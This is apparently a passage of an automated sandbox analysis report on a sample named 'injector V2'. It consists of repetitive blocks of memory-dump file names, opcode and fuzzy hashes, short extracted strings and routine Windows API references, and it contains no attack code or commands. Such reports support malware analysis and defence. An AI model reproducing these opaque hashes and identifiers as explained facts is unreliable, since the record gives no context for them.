                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: i.^$j.^
                                                                                                                            • API String ID: 0-1036069679
                                                                                                                            • Opcode ID: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
                                                                                                                            • Instruction ID: b39972b7eacc58a2c7a0aa23b5cb620b8f4f91b49de0b84d05968079cd545472
                                                                                                                            • Opcode Fuzzy Hash: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
                                                                                                                            • Instruction Fuzzy Hash: E6813A352047004F9A2C8A285CE863EB3C6EF95365F7957A9F613D76F0DF258D458283
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL$c79u
                                                                                                                            • API String ID: 0-4272471903
                                                                                                                            • Opcode ID: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
                                                                                                                            • Instruction ID: 1a3e91f8abad63049fc02d05efbee88f4c5d9fc0432a5e91a461f5f9759e86bf
                                                                                                                            • Opcode Fuzzy Hash: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
                                                                                                                            • Instruction Fuzzy Hash: 4E51AC356113219BDE2C9A24B9E9A3C7BE1DF58351B6502FDF80F57BB1D620EC848782
                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B55D7D,?,?,00000008,?,?,00B5594F,00000000), ref: 00B5604F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
                                                                                                                            • Instruction ID: a78a5f1c1eec4997b017ffc70b4d25ac533b1601345ab5b459fa28ef433e5682
                                                                                                                            • Opcode Fuzzy Hash: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
                                                                                                                            • Instruction Fuzzy Hash: 9CB13931110A089FD725CF28C4DAB657BE0FF45366F6986D8E99ACF2A1C335D986CB40
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B4EB3E: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B4CD28,00000001,00000364,00000000,00000002,000000FF,?,?,00B4E421,00B4DC80), ref: 00B4EB7F
                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F915
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00B4F954
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00B4F987
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2701053895-0
                                                                                                                            • Opcode ID: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
                                                                                                                            • Instruction ID: 95dd5effce4d5e6535595d2bdb47145ab5569a5eee812ae53b081e821185e276
                                                                                                                            • Opcode Fuzzy Hash: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
                                                                                                                            • Instruction Fuzzy Hash: 3651247590021AAFDF24AF389C85ABE77E9DF85358F1441EDF81997201EA348F41AB60
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B498EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            • Opcode ID: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
                                                                                                                            • Instruction ID: 608c1771c2aba19b4e6d17230fe177b54b4f8b61b8952222f9759d4b51fb992b
                                                                                                                            • Opcode Fuzzy Hash: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
                                                                                                                            • Instruction Fuzzy Hash: 69519AB1A103058FEB29CF59D8857AEBBF0FB48305F2485AAC419EB350E775DA40CB50
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000297D0,00B49125), ref: 00B496A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
                                                                                                                            • Instruction ID: c1a42fa247fc601252385e1b465b1fb9166aae621c8b56628788d68c9f290533
                                                                                                                            • Opcode Fuzzy Hash: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ~bD`
                                                                                                                            • API String ID: 0-944831652
                                                                                                                            • Opcode ID: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
                                                                                                                            • Instruction ID: 38f40f9d415ec8283c6c7b9de9aef08868a2ac34076cdcea7b2a8dd1ebf7f01b
                                                                                                                            • Opcode Fuzzy Hash: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
                                                                                                                            • Instruction Fuzzy Hash: 0A715876305B005B8A2C8F2C5DD8279B3D5EB95321F794BEBE412CB2E1EB25CD469602
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ~bD`
                                                                                                                            • API String ID: 0-944831652
                                                                                                                            • Opcode ID: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
                                                                                                                            • Instruction ID: 957d5bc68b16efaee0bfa2b872b6c5e6e52de3e2e0eed697aaa403380f1f823e
                                                                                                                            • Opcode Fuzzy Hash: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
                                                                                                                            • Instruction Fuzzy Hash: F95159B5300700AFDB289F2C9DD5B29B3E5EB99320F3846E6E915CB3A5E725CC45C642
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ~bD`
                                                                                                                            • API String ID: 0-944831652
                                                                                                                            • Opcode ID: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
                                                                                                                            • Instruction ID: f065bd67f2716db30674caa2eb9561aa7706fb985f59f092215580660f998781
                                                                                                                            • Opcode Fuzzy Hash: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
                                                                                                                            • Instruction Fuzzy Hash: AC4116BA3007009FDB14DF389DD5B2973E6EB98320F3986A5E915CB3A5E735C845C642
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL
                                                                                                                            • API String ID: 0-558896452
                                                                                                                            • Opcode ID: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
                                                                                                                            • Instruction ID: 81e3498a37e1a7f131bc8bcbdf1a46ad9cacfdf16361ec8ffa0635cc4d6d51af
                                                                                                                            • Opcode Fuzzy Hash: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
                                                                                                                            • Instruction Fuzzy Hash: 36411774550214ABEE686F14F892A3C7BE1EF14315F5440E9F40E2B766D631AC848BC2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL
                                                                                                                            • API String ID: 0-558896452
                                                                                                                            • Opcode ID: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
                                                                                                                            • Instruction ID: 50aad272a5704ea797ae2b0b1d9610d64ccdd7e36a810ffcc767f7947574ef57
                                                                                                                            • Opcode Fuzzy Hash: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
                                                                                                                            • Instruction Fuzzy Hash: 653139756502109FDE2CAF14B8E6A3C7BE1AF15315F6841EDF40F67AB2D631AC848782
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL
                                                                                                                            • API String ID: 0-558896452
                                                                                                                            • Opcode ID: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
                                                                                                                            • Instruction ID: a0e5232e26ff882e51c3306a825bf28221e26b698c55e9469c8198707c8d7b1d
                                                                                                                            • Opcode Fuzzy Hash: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
                                                                                                                            • Instruction Fuzzy Hash: 9A312670550221AAEE7C6B14B8E6A3C7BE1EF24351F6440EDF40F27A66D620AC8486C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL
                                                                                                                            • API String ID: 0-558896452
                                                                                                                            • Opcode ID: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
                                                                                                                            • Instruction ID: 0990fa742f22ff97d44b851b84429694efb19efcfe474c5d9a212dcbad976b9d
                                                                                                                            • Opcode Fuzzy Hash: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
                                                                                                                            • Instruction Fuzzy Hash: 06315970550220ABEE6C6B14B8E6A3C7BE1AF24311F6440EDF40F27B66D631AC8487C3
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 54951025-0
                                                                                                                            • Opcode ID: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
                                                                                                                            • Instruction ID: f7e8ae0ade9bea7654d54ed7757b15fcadf4285e9d6b62c58b30d3b7d127be95
                                                                                                                            • Opcode Fuzzy Hash: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
                                                                                                                            • Instruction Fuzzy Hash: 01A011302023008F83808F32AE083083AEAAA002C2B00C0A8A008C2220EE38A0008F00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
                                                                                                                            • Instruction ID: 9281044b62e77eb99db6f77444bb0b88021bd2472eef64766d044ee83c91b906
                                                                                                                            • Opcode Fuzzy Hash: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
                                                                                                                            • Instruction Fuzzy Hash: 38120939708B448BCE388E2894D453D73D2EB84715FB94AAEE867DB3A0DE20CD459753
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
                                                                                                                            • Instruction ID: 453ab81fef1f10d1088df85493cc90d88d2669f49e62b75fe4a6b9b28dcf8270
                                                                                                                            • Opcode Fuzzy Hash: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
                                                                                                                            • Instruction Fuzzy Hash: 27E1607A2143004F4D2CDE3869C472A77D2D7A5330B388AD2E822DB3E4DB75DF65A252
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
                                                                                                                            • Instruction ID: bf57f3e73b624efeaae79f84d2a4646813c5f9c74dee0356c0fd97192130efae
                                                                                                                            • Opcode Fuzzy Hash: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
                                                                                                                            • Instruction Fuzzy Hash: 66D1283975A3108F9D289638A5D522D33C28B96330B388BE5E521CB3E5EB65DF45E243
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
